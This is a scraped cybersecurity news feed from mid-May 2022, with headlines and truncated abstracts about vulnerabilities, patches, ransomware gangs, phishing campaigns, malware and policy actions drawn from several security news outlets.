A new research published by academics from KU Leuven, Radboud University, and the University of Lausanne has revealed that users' email addresses are exfiltrated to tracking, marketing, and analytics domains before such is submitted and without prior consent. The study involved crawling 2.8 million pages from the top 100 websites, and found that as many as 1,844 websites allowed trackers to capture email addresses before form submission in the European Union, a number that jumped to 2,950 when the same set of websites were visited from the U.S. "Emails (or their hashes) were sent to 174 distinct domains ( eTLD+1 ) in the U.S. crawl, and 157 distinct domains in the EU crawl," the researchers said . Furthermore, 52 websites were determined to be collecting passwords in the same manner, an issue that has since been addressed following responsible disclosure. LiveRamp, Taboola, Adobe, Verizon, Yandex, Meta Platforms, TikTok, Salesforce, Listrak, and Oracle accounted fThe Hacker News
May 18, 2022 – Vulnerabilities
VMware Releases Patches for New Vulnerabilities Affecting Multiple Products Full Text
Abstract
VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication. CVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the "root" user on vulnerable virtual appliances. "It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments," VMware said . The disclosure follows a warning from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 — two other VMware flaws tThe Hacker News
May 18, 2022 – Criminals
Spanish police dismantle phishing gang that emptied bank accounts Full Text
Abstract
The Spanish police have announced the arrest of 13 people and the launch of investigations on another 7 for their participation in a phishing ring that defrauded at least 146 people.BleepingComputer
May 18, 2022 – Phishing
New Phishing Attack Spreads Fileless Malware Trio | Cyware Hacker News Full Text
Abstract
A phishing campaign has been observed targeting Windows users with three different fileless malware to steal sensitive information. The three malware are identified as BitRAT , PandoraHVNC, and AveMariaRAT. VBA scripts and PowerShell are used to retrieve the malware and install it on the victim' ... Read MoreCyware Alerts - Hacker News
May 18, 2022 – Education
How to Protect Your Data When Ransomware Strikes Full Text
Abstract
Ransomware is not a new attack vector. In fact, the first malware of its kind appeared more than 30 years ago and was distributed via 5.25-inch floppy disks. To pay the ransom, the victim had to mail money to a P.O. Box in Panama. Fast forward to today, affordable ransomware-as-a-service (RaaS) kits are available on the dark web for anyone to purchase and deploy and attackers have an infinite number of channels available to them to infiltrate organizations as a result of reliance on cloud and mobile technologies. Initiating a ransomware attack is all about discretely gaining access. And as employees can now access your data from anywhere, you have lost visibility into how they do so. To safeguard against these attacks, you're not just looking for malware, you need continuous insights into your users, the endpoints they use and the applications and data they access. Lookout , a leader in endpoint-to-cloud security, has published an interactive infographic to help you visualizThe Hacker News
May 18, 2022 – Vulnerabilities
VMware fixed a critical auth bypass issue in some of its products Full Text
Abstract
VMware addressed a critical authentication bypass vulnerability "affecting local domain users" in multiple products. The virtualization giant warns that a threat actor can exploit the flaw, tracked as CVE-2022-22972 (CVSSv3 base score of 9.8),...Security Affairs
May 18, 2022 – Vulnerabilities
Critical Jupiter WordPress plugin flaws let hackers take over sites Full Text
Abstract
WordPress security analysts have discovered a set of vulnerabilities impacting the Jupiter Theme and JupiterX Core plugins for WordPress, one of which is a critical privilege escalation flaw.BleepingComputer
May 18, 2022 – Malware
UpdateAgent Updated with New Malware Dropper Full Text
Abstract
A new variant of UpdateAgent macOS malware was tracked, indicating ongoing attempts on the part of its authors to upgrade its functionalities. The new dropper is a Swift-based executable, which masquerades as Mach-O binaries such as PDFCreator and ActiveDirectory. It is recommended to stay a ... Read MoreCyware Alerts - Hacker News
May 18, 2022 – Criminals
Researchers Expose Inner Workings of Billion-Dollar Wizard Spider Cybercrime Gang Full Text
Abstract
The inner workings of a cybercriminal group known as the Wizard Spider have been exposed, shedding light on its organizational structure and motivations. "Most of Wizard Spider's efforts go into hacking European and U.S. businesses, with a special cracking tool used by some of their attackers to breach high-value targets," Swiss cybersecurity company PRODAFT said in a new report shared with The Hacker News. "Some of the money they get is put back into the project to develop new tools and talent." Wizard Spider, also known as Gold Blackburn, is believed to operate out of Russia and refers to a financially motivated threat actor that's been linked to the TrickBot botnet, a modular malware that was officially discontinued earlier this year in favor of improved malware such as BazarBackdoor. That's not all. The TrickBot operators have also extensively cooperated with Conti , another Russia-linked cybercrime group notorious for offering ransomware-aThe Hacker News
May 18, 2022 – Attack
Microsoft warns of attacks targeting MSSQL servers using the tool sqlps Full Text
Abstract
Microsoft warns of brute-forcing attacks targeting Microsoft SQL Server (MSSQL) database servers exposed online. Microsoft warns of a new hacking campaign aimed at MSSQL servers, threat actors are launching brute-forcing attacks against poorly protected...Security Affairs
May 18, 2022 – Breach
National bank hit by ransomware trolls hackers with dick pics Full Text
Abstract
After suffering a ransomware attack by the Hive operation, the Bank of Zambia made it clear that they were not going to pay by posting a picture of male genitalia and telling the hackers to s… (well, you can use your imagination).BleepingComputer
May 18, 2022 – Malware
New SYK Crypter Propagates via Discord Full Text
Abstract
Threat actors are abusing Discord’s CDN with the new SYK crypter designed to dodge behavior-based security controls while opening a gate to different malware families, such as AsyncRAT, NanoCore RAT, and more. The increasing number of people using the community chat platform has continued attractin ... Read MoreCyware Alerts - Hacker News
May 18, 2022 – Attack
Hackers Gain Fileless Persistence on Targeted SQL Servers Using a Built-in Utility Full Text
Abstract
Microsoft on Tuesday warned that it recently spotted a malicious campaign targeting SQL Servers that leverages a built-in PowerShell binary to achieve persistence on compromised systems. The intrusions, which leverage brute-force attacks as an initial compromise vector, stand out for their use of the utility " sqlps.exe ," the tech giant said in a series of tweets. The ultimate goals of the campaign are unknown, as is the identity of the threat actor staging it. Microsoft is tracking the malware under the name " SuspSQLUsage ." The sqlps.exe utility, which comes by default with all versions of SQL Servers, enables an SQL Agent — a Windows service to run scheduled tasks — to run jobs using the PowerShell subsystem. "The attackers achieve fileless persistence by spawning the sqlps.exe utility, a PowerShell wrapper for running SQL-built cmdlets, to run recon commands and change the start mode of the SQL service to LocalSystem," Microsoft noted. AddiThe Hacker News
May 18, 2022 – Malware
Microsoft warns of the rise of cryware targeting hot wallets Full Text
Abstract
Microsoft researchers warn of the rising threat of cryware targeting non-custodial cryptocurrency wallets, also known as hot wallets. Microsoft warns of the rise of cryware, malicious software used to steal info an dfunds from non-custodial cryptocurrency...Security Affairs
May 18, 2022 – Criminals
US recovers $15 million from global Kovter ad fraud operation Full Text
Abstract
The US government has recovered over $15 million from Swiss bank accounts belonging to operators behind the '3ve' online advertising fraud scheme.BleepingComputer
May 18, 2022 – Ransomware
Chaos Ransomware Variant Sides with Russia Full Text
Abstract
Such actions have created tension internally within the threat actor groups as it has caused dissension, and externally, as organizations fear being targeted due to the political nature of the war.Fortinet
May 18, 2022 – Education
[eBook] Your 90-Day MSSP Plan: How to Improve Margins and Scale-Up Service Delivery Full Text
Abstract
To cash in on a thriving market, a managed security service provider (MSSP) must navigate unprecedented competition and complex challenges. The good news is that demand is through the roof. 69% of organizations plan to boost spending on cybersecurity in 2022. The bad news is that everyone wants a piece of the pie. MSSPs must outshine each other while fending off encroachments by traditional IT vendors and MSPs. As a result, some MSSPs are succumbing to the squeeze of low margins. Others are struggling to scale successfully. The most successful MSSPs are taking action to improve their current financial position while laying a foundation for long-term growth. A new eBook, " Your 90-Day MSSP Plan: How to Improve Margins and Scale Up Service Delivery ," to help MSSPs understand the current cybersecurity landscape, their current position in it, what you they're well, and where they can improve the most. This nine-step plan offers a clear path for MSSPs to boost profitabThe Hacker News
May 18, 2022 – Criminals
Conti Ransomware gang threatens to overthrow the government of Costa Rica Full Text
Abstract
The Conti ransomware gang is threatening to 'overthrow' the new government of Costa Rica after last month's attack. Last month, the Conti ransomware gang claimed responsibility for the attack on Costa Rica government infrastructure after that the government...Security Affairs
May 18, 2022 – Government
DHS orders federal agencies to patch VMware bugs within 5 days Full Text
Abstract
The Department of Homeland Security's cybersecurity unit ordered Federal Civilian Executive Branch (FCEB) agencies today to urgently update or remove VMware products from their networks by Monday due to an increased risk of attacks.BleepingComputer
May 18, 2022 – General
Cybersecurity pros spend hours on issues that should have been prevented Full Text
Abstract
In a survey commissioned by Invicti, some 41% of the security professionals and 32% of the developers surveyed said they spend more than five hours each workday addressing security issues that should not have occurred in the first place.Tech Republic
May 18, 2022 – Government
U.S. Warns Against North Korean Hackers Posing as IT Freelancers Full Text
Abstract
Highly skilled software and mobile app developers from the Democratic People's Republic of Korea (DPRK) are posing as "non-DPRK nationals" in hopes of landing freelance employment in an attempt to enable the regime's malicious cyber intrusions . That's according to a joint advisory from the U.S. Department of State, the Department of the Treasury, and the Federal Bureau of Investigation (FBI) issued on Monday. Targets include financial, health, social media, sports, entertainment, and lifestyle-focused companies located in North America, Europe, and East Asia, with most of the dispatched workers situated in China, Russia, Africa, and Southeast Asia. The goal, the U.S. agencies warn, is to generate a constant stream of revenue that sidesteps international sanctions imposed on the nation and help serve its economic and security priorities, including the development of nuclear and ballistic missiles. "The North Korean government withholds up to 90 perceThe Hacker News
May 18, 2022 – Malware
Experts spotted a new variant of UpdateAgent macOS malware dropper written in Swift Full Text
Abstract
Researchers spotted a new variant of the UpdateAgent macOS malware dropper that was employed in attacks in the wild. Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version...Security Affairs
May 18, 2022 – Attack
Chinese ‘Space Pirates’ are hacking Russian aerospace firms Full Text
Abstract
A previously unknown Chinese hacking group known as 'Space Pirates' targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems.BleepingComputer
May 18, 2022 – Vulnerabilities
Over 380,000 Kubernetes API Servers Exposed to Internet: Shadowserver Full Text
Abstract
ShadowServer is conducting daily scans of the IPv4 space on ports 443 and 6443, looking for IP addresses that respond with an HTTP 200 OK status, which indicates that the request has succeeded.Security Week
May 18, 2022 – Malware
Microsoft Warns of “Cryware” Info-Stealing Malware Targeting Crypto Wallets Full Text
Abstract
Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks. The tech giant dubbed the new threat "cryware," with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet. "Cryware are information stealers that collect and exfiltrate data directly from non-custodial cryptocurrency wallets, also known as hot wallets ," Berman Enconado and Laurie Kirk of the Microsoft 365 Defender Research Team said in a new report. "Because hot wallets, unlike custodial wallets, are stored locally on a device and provide easier access to cryptographic keys needed to perform transactions, more and more threats are targeting them." Attacks of this kind are not theoretical. Earlier this year, Kaspersky disclosed a financially-motivated campaign staged by the North Korea-based Lazarus GrThe Hacker News
May 18, 2022 – Vulnerabilities
VMware patches critical auth bypass flaw in multiple products Full Text
Abstract
VMware warned customers today to immediately patch a critical authentication bypass vulnerability "affecting local domain users" in multiple products that can be exploited to obtain admin privileges.BleepingComputer
May 18, 2022 – General
The Vulnerable Maritime Supply Chain - a Threat to the Global Economy Full Text
Abstract
The merchant maritime sector functions with vessels that have been operational for anything from a few years to a few decades. The older vessels have had new technology added to improve efficiency through digitization and automation.Security Week
May 18, 2022 – Government
CISA shares guidance to block ongoing F5 BIG-IP attacks Full Text
Abstract
In a joint advisory issued today, CISA and the Multi-State Information Sharing and Analysis Center (MS-ISAC) warned admins of active attacks targeting a critical F5 BIG-IP network security vulnerability (CVE-2022-1388).BleepingComputer
May 18, 2022 – Breach
Data of 22.5 Million Malaysians Born 1940-2004 Allegedly Being Sold for $10,000 Full Text
Abstract
The alleged data leak involves information purportedly stolen from the National Registration Department (NRD). Local tech portal Amanz reported that the database, 160GB in size, is being sold for US$10,000 (S$13,846) on the dark web.Straits Times
May 18, 2022 – Criminals
Fake crypto sites lure wannabe thieves by spamming login credentials Full Text
Abstract
Threat actors are luring potential thieves by spamming login credentials for other people account's on fake crypto trading sites, illustrating once again, that there is no honor among thieves.BleepingComputer
May 18, 2022 – APT
Bangladesh Added to Targets in Bitter APT’s Ongoing Campaign Full Text
Abstract
Cisco Talos revealed an ongoing campaign operated by the APT actor since August 2021. The campaign has been launched against an elite unit of the Bangladeshi government via spear-phishing emails.Cyware Alerts - Hacker News
May 18, 2022 – Attack
Microsoft warns of brute-force attacks targeting MSSQL servers Full Text
Abstract
Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords.BleepingComputer
May 17, 2022 – Vulnerabilities
iPhones Vulnerable to Attack Even When Turned Off Full Text
Abstract
Wireless features Bluetooth, NFC and UWB stay on even when the device is powered down, which could allow attackers to execute pre-loaded malware.Threatpost
May 17, 2022 – Attack
Russian Conti Ransomware Gang Threatens to Overthrow New Costa Rican Government Full Text
Abstract
The notorious Conti ransomware gang, which last month staged an attack on Costa Rican administrative systems, has threatened to "overthrow" the new government of the country. "We are determined to overthrow the government by means of a cyber attack, we have already shown you all the strength and power," the group said on its official website. "We have our insiders in your government. We are also working on gaining access to your other systems, you have no other options but to pay us." In a further attempt to increase pressure, the Russian-speaking cybercrime syndicate has raised its ransom demand to $20 million in return for a decryption key to unlock their systems. Another message posted on its dark web portal over the weekend issued a warning stating it will delete the decryption keys in a week, a move that would make it impossible for Costa Rica to recover access to the files encrypted by the ransomware. "I appeal to every resident of Costa RThe Hacker News
May 17, 2022 – Hacker
North Korean devs pose as US freelancers to aid DRPK govt hackers Full Text
Abstract
The U.S. government is warning that the Democratic People's Republic of Korea (DPRK) is dispatching its IT workers to get freelance jobs at companies across the world to obtain privileged access that is sometimes used to facilitate cyber intrusions.BleepingComputer
May 17, 2022 – Government
North Korean devs pose as US freelancers and aid DRPK govt hackers Full Text
Abstract
The U.S. government is warning that the Democratic People's Republic of Korea (DPRK) is dispatching its IT workers to get freelance jobs at companies across the world to obtain privileged access that is sometimes used to facilitate cyber intrusions.BleepingComputer
May 17, 2022 – Business
French group Thales buys two cybersecurity firms Full Text
Abstract
France's Thales said on Tuesday it had struck a deal with Sonae Investment Management to acquire two European cybersecurity companies, S21sec and Excellium, for an enterprise value of 120 million euros (~$125 million).Reuters
May 17, 2022 – Malware
UpdateAgent Returns with New macOS Malware Dropper Written in Swift Full Text
Abstract
A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities. "Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat Labs said in a report. UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections. The newly discovered Swift-based dropper masquerades as Mach-O binaries named " PDFCreator " and " ActiveDirectory " that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed. "The primary difference [between the two executables] is that it reaches out to a different URL from whThe Hacker News
May 17, 2022 – Policy and Law
President Biden’s Policy Changes for Offensive Cyber Operations Full Text
Abstract
Concerns about changes to the U.S. policy on offensive cyber operations raise an interesting and important question about the balance of power between the White House and the Department of Defense. But this is a poor framing of the problem.Lawfare
May 17, 2022 – Policy and Law
Venezuelan cardiologist accused of operating and selling Thanos ransomware Full Text
Abstract
The U.S. Justice Department accused a 55-year-old Venezuelan cardiologist of operating and selling the Thanos ransomware. The U.S. Justice Department accused Moises Luis Zagala Gonzalez, a 55-year-old cardiologist from Venezuela, of operating and selling...Security Affairs
May 17, 2022 – Vulnerabilities
NVIDIA fixes ten vulnerabilities in Windows GPU display drivers Full Text
Abstract
NVIDIA has released a security update for a wide range of graphics card models, addressing four high-severity and six medium-severity vulnerabilities in its GPU drivers.BleepingComputer
May 17, 2022 – Government
Beware of North Korean IT workers with fake credentials, US government warns Full Text
Abstract
The federal agencies said the freelancers often send money back to North Korea, contributing to its weapons programs, which have earned broad sanctions from the U.S. and United Nations.The Record
May 17, 2022 – General
Are You Investing in Securing Your Data in the Cloud? Full Text
Abstract
Traditional businesses migrating to the cloud need robust information security mechanisms. Gartner predicts that more than 95% of new digital workloads will continue to be deployed on cloud-native platforms by 2025. Robust cloud data security is imperative for businesses adopting rapid digital transformation to the cloud. While a traditional hosting model could be considered more secure, not all organizations are receptive to relinquishing control over their infrastructure or applications by relying on a cloud provider at an increased risk of data theft from a cyberattack done by an outsider. Having said so, let's try to understand the vital part. What is Cloud Data Security? Cloud data security entails securing data, whether at rest or in motion, on cloud-based infrastructure, applications, etc., against cyber threats like data breaches, unauthorized access, DDoS attacks, etc. This includes the technologies, policies, controls, and services to protect cloud-based systemThe Hacker News
May 17, 2022 – Malware
Over 200 Apps on Play Store were distributing Facestealer info-stealer Full Text
Abstract
Experts spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data. Trend Micro researchers spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used...Security Affairs
May 17, 2022 – Solution
Microsoft Defender for Endpoint gets new troubleshooting mode Full Text
Abstract
Microsoft says Defender for Endpoint now comes with a new 'troubleshooting mode' that will help Windows admins test Defender Antivirus performance and run compatibility scenarios without getting blocked by tamper protection.BleepingComputer
May 17, 2022 – Business
Access Orchestration Firm Pathlock Announces Several M&As and $200M Funding Full Text
Abstract
Pathlock on Tuesday announced mergers with ERP data security firm Appsian, and Security Weaver, a company that provides governance, risk, and compliance management (GRCM) software for SAP.Security Week
May 17, 2022 – Policy and Law
U.S. Charges Venezuelan Doctor for Using and Selling Thanos Ransomware Full Text
Abstract
The U.S. Justice Department on Monday accused a 55-year-old cardiologist from Venezuela of being the mastermind behind Thanos ransomware , charging him with the use and sale of the malicious tool and entering into profit sharing arrangements. Moises Luis Zagala Gonzalez, also known by the monikers Nosophoros, Aesculapius, and Nebuchadnezzar, is alleged to have both developed and marketed the ransomware to other cybercriminals to facilitate the intrusions and get a share of the bitcoin payment. If convicted, Zagala faces up to five years' imprisonment for attempted computer intrusion, and five years' imprisonment for conspiracy to commit computer intrusions. "The multi-tasking doctor treated patients, created and named his cyber tool after death , profited from a global ransomware ecosystem in which he sold the tools for conducting ransomware attacks, trained the attackers about how to extort victims, and then boasted about successful attacks, including by maliciousThe Hacker News
May 17, 2022 – Government
CISA adds CVE-2022-30525 flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
US Critical Infrastructure Security Agency (CISA) adds critical CVE-2022-30525 RCE flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency added the recently disclosed...Security Affairs
May 17, 2022 – General
Cybersecurity agencies reveal top initial access attack vectors Full Text
Abstract
A joint security advisory issued by multiple national cybersecurity authorities revealed today the top 10 attack vectors most exploited by threat actors for breaching networks.BleepingComputer
May 17, 2022 – Breach
Ransomware-as-a-Service Operator AvosLocker Claims Data Theft from Another Healthcare Entity Full Text
Abstract
In its most recent assault against a healthcare entity, ransomware-as-a-service operator AvosLocker claims to be behind an attack allegedly involving data theft from Texas-based CHRISTUS Health.Gov Info Security
May 17, 2022 – Botnet
New Sysrv Botnet Variant Hijacking Windows and Linux with Crypto Miners Full Text
Abstract
Microsoft is warning of a new variant of the srv botnet that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems. The tech giant, which has called the new version Sysrv-K , is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020. "Sysrv-K scans the internet to find web servers with various vulnerabilities to install itself," the company said in a series of tweets. "The vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution vulnerabilities." This also includes CVE-2022-22947 (CVSS score: 10.0), a code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host via a maliciously crafted request. It's worth noting that the abuse of CVE-2022-22947 has prompted the U.S. CybThe Hacker News
May 17, 2022 – Malware
A custom PowerShell RAT uses to target German users using Ukraine crisis as bait Full Text
Abstract
Researchers spotted a threat actor using a custom PowerShell RAT targeting German users to gain intelligence on the Ukraine crisis. Malwarebytes experts uncovered a campaign that targets German users with custom PowerShell RAT targeting. The threat...Security Affairs
May 17, 2022 – Vulnerabilities
Hackers can steal your Tesla Model 3, Y using new Bluetooth attack Full Text
Abstract
Security researchers at the NCC Group have developed a tool to carry out a Bluetooth Low Energy (BLE) relay attack that bypasses all existing protections to authenticate on target devices.BleepingComputer
May 17, 2022 – Education
Best practices for healthcare delivery organizations to manage supply chain cybersecurity risks Full Text
Abstract
Drafted by the Health Information Management Working Group, the report provides best practices that healthcare delivery organizations (HDOs) can use to manage the cybersecurity risks associated with their supply chains.Help Net Security
May 17, 2022 – Malware
Over 200 Apps on Play Store Caught Spying on Android Users Using Facestealer Full Text
Abstract
More than 200 Android apps masquerading as fitness, photo editing, and puzzle apps have been observed distributing spyware called Facestealer to siphon user credentials and other valuable information. "Similar to Joker , another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants," Trend Micro analysts Cifer Fang, Ford Quin, and Zhengyu Dong said in a new report. "Since its discovery, the spyware has continuously beleaguered Google Play." Facestealer, first documented by Doctor Web in July 2021, refers to a group of fraudulent apps that invade the official app marketplace for Android with the goal of plundering sensitive data such as Facebook login credentials. Of the 200 apps, 42 are VPN services, followed by a camera (20) and photo editing applications (13). In addition to harvesting credentials, the apps are also designed to collect Facebook cookies and personally identifiable information associated with a vicThe Hacker News
May 17, 2022 – General
What is ISO 27001 and Why it Matters for Compliance Standards Full Text
Abstract
ISO 27001 may seem like a big undertaking, but the certification can pay off in more ways than one—including overlap with compliance regulations. Read about the benefits of ISO 27001 and how to get started.BleepingComputer
May 17, 2022 – Business
Pangea Lands $25 Million Investment for API Security Services Full Text
Abstract
Pangea, the brainchild of serial entrepreneur Oliver Friedrichs, said the Series A funding round was led by Ballistic Ventures, a new investment firm focused exclusively on cybersecurity companies.Security Week
May 17, 2022 – Vulnerabilities
CISA warns admins to patch actively exploited Spring, Zyxel bugs Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has added two more vulnerabilities to its list of actively exploited bugs, a code injection bug in the Spring Cloud Gateway library and a command injection flaw in Zyxel firmware for business firewalls and VPN devices.BleepingComputer
May 17, 2022 – Government
FBI Warns of Hackers Using Malicious PHP Code to Steal Credit Card Data Full Text
Abstract
The attackers began targeting US businesses in September 2020 by inserting malicious PHP code into the customized online checkout pages. But earlier this year, the actors changed tactics using a different PHP function.ZDNet
May 17, 2022 – Attack
Hackers target Tatsu WordPress plugin in millions of attacks Full Text
Abstract
Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites.BleepingComputer
May 17, 2022 – Cryptocurrency
How cryptocurrencies enable attackers and defenders Full Text
Abstract
A rise in the popularity of cryptocurrency-based crime, doubled with a lack of regulation, has paved the way for cybercriminals to extort vast amounts of money from legitimate organizations.Tech Target
May 16, 2022 – Attack
Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability Full Text
Abstract
Image source: z3r00t The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog , citing evidence of active exploitation. Tracked as CVE-2022-30525 , the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system. Impacted devices include - USG FLEX 100, 100W, 200, 500, 700 USG20-VPN, USG20W-VPN ATP 100, 200, 500, 700, 800, and VPN series The issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7. Source: Shadowserver Merely a day later, the Shadowserver Foundation said it began detecting exploitation attempts,The Hacker News
May 16, 2022 – Phishing
HTML attachments remain popular among phishing actors in 2022 Full Text
Abstract
HTML files remain one of the most popular attachments used in phishing attacks for the first four months of 2022, showing that the technique remains effective against antispam engines and works well on the victims themselves.BleepingComputer
May 16, 2022 – Attack
Nerbian RAT Spreads via Emails in Ongoing Attacks Full Text
Abstract
Nerbian RAT is impersonating the WHO and pretends to contain important information regarding COVID-19. It is currently targeting entities in Italy, Spain, and the U.K. Deploy anti-phishing solutions and email gateways to stay protected.Cyware Alerts - Hacker News
May 16, 2022 – Vulnerabilities
Researchers Find Potential Way to Run Malware on iPhone Even When it’s OFF Full Text
Abstract
A first-of-its-kind security analysis of iOS Find My function has identified a novel attack surface that makes it possible to tamper with the firmware and load malware onto a Bluetooth chip that's executed while an iPhone is "off." The mechanism takes advantage of the fact that wireless chips related to Bluetooth, Near-field communication ( NFC ), and ultra-wideband ( UWB ) continue to operate while iOS is shut down when entering a "power reserve" Low Power Mode (LPM). While this is done so as to enable features like Find My and facilitate Express Card transactions , all the three wireless chips have direct access to the secure element, academics from the Secure Mobile Networking Lab ( SEEMOO ) at the Technical University of Darmstadt said in a paper. "The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM," the researchers said. "Since LPM support is implemeThe Hacker News
May 16, 2022 – Vulnerabilities
Apple fixes the sixth zero-day since the beginning of 2022 Full Text
Abstract
Apple released security updates to address a zero-day bug actively exploited in attacks against Macs and Apple Watch devices. Apple has addressed a zero-day vulnerability, tracked as CVE-2022-22675, actively exploited in attacks aimed at Macs and Apple...Security Affairs
May 16, 2022 – Privacy
Third-party web trackers log what you type before submitting Full Text
Abstract
An extensive study looking into the top 100k ranking websites has revealed that many are leaking information you enter in the site forms to third-party trackers before you even press submit.BleepingComputer
May 16, 2022 – Vulnerabilities
SharePoint RCE bug resurfaces three months after being patched by Microsoft Full Text
Abstract
The flaw, a variant on an issue that was patched in February, uses the site creation features of SharePoint, Microsoft’s intranet platform, to upload and run malicious files on the server.The Daily Swig
May 16, 2022 – General
Fake Clickjacking Bug Bounty Reports: The Key Facts Full Text
Abstract
Are you aware of fake clickjacking bug bounty reports? If not, you should be. This article will get you up to speed and help you to stay alert. What are clickjacking bug bounty reports? If we start by breaking up the term into its component parts, a bug bounty is a program offered by an organization, in which individuals are rewarded for finding and reporting software bugs. These programs are often used by companies as a cost-effective way to find and fix software vulnerabilities, thereby improving the security of their products. They also help to build goodwill with the security community. For the bounty hunters (or white hat hackers), they have an opportunity to earn money and recognition for their skills. Clickjacking is a malicious technique used to trick users into clicking on something that they think is safe, but is actually harmful. For example, a hacker could create a fake button that looks like the "like" button on a social media site. When users click on it,The Hacker News
May 16, 2022 – Vulnerabilities
Experts show how to run malware on chips of a turned-off iPhone Full Text
Abstract
Researchers devised an attack technique to tamper the firmware and execute a malware onto a Bluetooth chip when an iPhone is "off." A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated...Security Affairs
May 16, 2022 – Ransomware
US links Thanos and Jigsaw ransomware to 55-year-old doctor Full Text
Abstract
The US Department of Justice today said that Moises Luis Zagala Gonzalez (Zagala), a 55-year-old cardiologist with French and Venezuelan citizenship residing in Ciudad Bolivar, Venezuela, created and rented Jigsaw and Thanos ransomware to cybercriminals.BleepingComputer
May 16, 2022 – Malware
Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys Full Text
Abstract
Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants. Since its discovery, the spyware has continuously beleaguered Google Play.Trend Micro
May 16, 2022 – Malware
Researchers Warn of “Eternity Project” Malware Service Being Sold via Telegram Full Text
Abstract
An unidentified threat actor has been linked to an actively in-development malware toolkit called the "Eternity Project" that lets professional and amateur cybercriminals buy stealers, clippers, worms, miners, ransomware, and a distributed denial-of-service (DDoS) bot. What makes this malware-as-a-service (MaaS) stand out is that besides using a Telegram channel to communicate updates about the latest features, it also employs a Telegram Bot that enables the purchasers to build the binary. "The [threat actors] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies," researchers from Cyble said in a report published last week. Each of the modules can be leased separately and provides paid access to a wide variety of functions - Eternity Stealer ($260 for an annual subscription) - Siphon passwords, cookies, credit cards, browser cryptocurrency extensions, cryptThe Hacker News
May 16, 2022 – Policy and Law
Ukrainian national sentenced to 4 years in prison for selling access to hacked servers Full Text
Abstract
A 28-year-old Ukrainian national has been sentenced to four years in prison for selling access to hacked servers. Glib Oleksandr Ivanov-Tolpintsev, a 28-year-old Ukrainian national, has been sentenced to four years in prison for selling access to comprised...Security Affairs
May 16, 2022 – Vulnerabilities
Apple emergency update fixes zero-day used to hack Macs, Watches Full Text
Abstract
Apple has released security updates to address a zero-day vulnerability that threat actors can exploit in attacks targeting Macs and Apple Watch devices.BleepingComputer
May 16, 2022 – Phishing
This phishing attack delivers three forms of malware. And they all want to steal your data Full Text
Abstract
Detailed by cybersecurity researchers at Fortinet, those who unintentionally run the malicious attachment sent in phishing emails fall victim to AveMariaRAT, BitRAT and PandoraHVNC trojan malware.ZDNet
May 16, 2022 – General
Eternity Project: You can pay $260 for a stealer and $490 for a ransomware Full Text
Abstract
Researchers from threat intelligence firm Cyble analyzed the Eternity Project Tor website which offers any kind of malicious code. Researchers at cybersecurity firm Cyble analyzed a Tor website named named ‘Eternity Project' that offers for sale...Security Affairs
May 16, 2022 – Attack
Ukraine supporters in Germany targeted with PowerShell RAT malware Full Text
Abstract
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT (remote access trojan) and stealing their data.BleepingComputer
May 16, 2022 – General
Researchers warn of APTs, data leaks as serious threats against UK financial sector Full Text
Abstract
APTs target organizations worldwide and those located in the UK are no exception. Over the past few years, APTs including the Chinese APT40 and APT31 have utilized vulnerabilities including ProxyLogon to compromise UK businesses.ZDNet
May 16, 2022 – Government
CISA warns not to install May Windows updates on domain controllers Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has removed a Windows security flaw from its catalog of known exploited vulnerabilities due to Active Directory (AD) authentication issues caused by the May 2022 updates that patch it.BleepingComputer
